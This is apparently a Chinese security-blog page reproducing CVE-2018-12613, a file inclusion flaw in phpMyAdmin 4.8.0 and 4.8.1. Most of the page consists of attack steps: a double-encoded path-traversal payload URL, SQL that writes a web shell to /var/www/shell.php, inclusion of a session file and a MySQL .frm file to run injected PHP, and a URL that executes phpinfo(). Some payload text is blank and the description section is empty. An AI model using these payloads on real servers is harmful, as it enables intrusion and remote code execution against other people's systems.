(CVE-2018-12613)Phpmyadmin_远程文件包含漏洞

# (CVE-2018-12613)Phpmyadmin 远程文件包含漏洞

=====

一、漏洞简介
————

二、漏洞影响
————

phpMyAdmin 4.8.0和4.8.1受到影响。

三、复现过程
————

首先需要登录phpmyadmin

### payload

http://0-sec.org/index.php?target=db_sql.php%253f/../../../../../../phpStudy/使用说明.txt

![](/static/qingy/(CVE-2018-12613)Phpmyadmin_远程文件包含漏洞/img/rId25.png)

### 写入shell

#### 第一种姿势

##### 1、写入shell,测试语句:

SELECT ‘

![](/static/qingy/(CVE-2018-12613)Phpmyadmin_远程文件包含漏洞/img/rId29.png)

##### 2、查看自己的sessionid(cookie中phpMyAdmin的值)。(或者Bp抓包获取本地的cookie值也可以)

![](/static/qingy/(CVE-2018-12613)Phpmyadmin_远程文件包含漏洞/img/rId31.png)

##### 补充代码

如果上述方法不行的话,则用以下代码

select ‘‘ into outfile ‘/var/www/shell.php’

##### 3、访问:

http://0-sec.org/index.php?target=db_sql.php%253f/../../../../../../../../phpStudy/tmp/tmp/sess_20f18hqcr2mc0nmq96vp920r6phc06v3

#### 第二种姿势

##### 1、在数据表里面添加一句话(这里一点要用get!)

![](/static/qingy/(CVE-2018-12613)Phpmyadmin_远程文件包含漏洞/img/rId36.png)

##### 2、此时会在phpStudyMySQLdata 对应数据库下生成一个frm文件(不同版本路径可能不一样)

![](/static/qingy/(CVE-2018-12613)Phpmyadmin_远程文件包含漏洞/img/rId38.png)

##### 3、访问

http://0-sec.org/index.php?9ouu=phpinfo();&target=db_sql.php%253f/../../../../../../phpStudy/MySQL/data/9ouu/test.frm

image

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容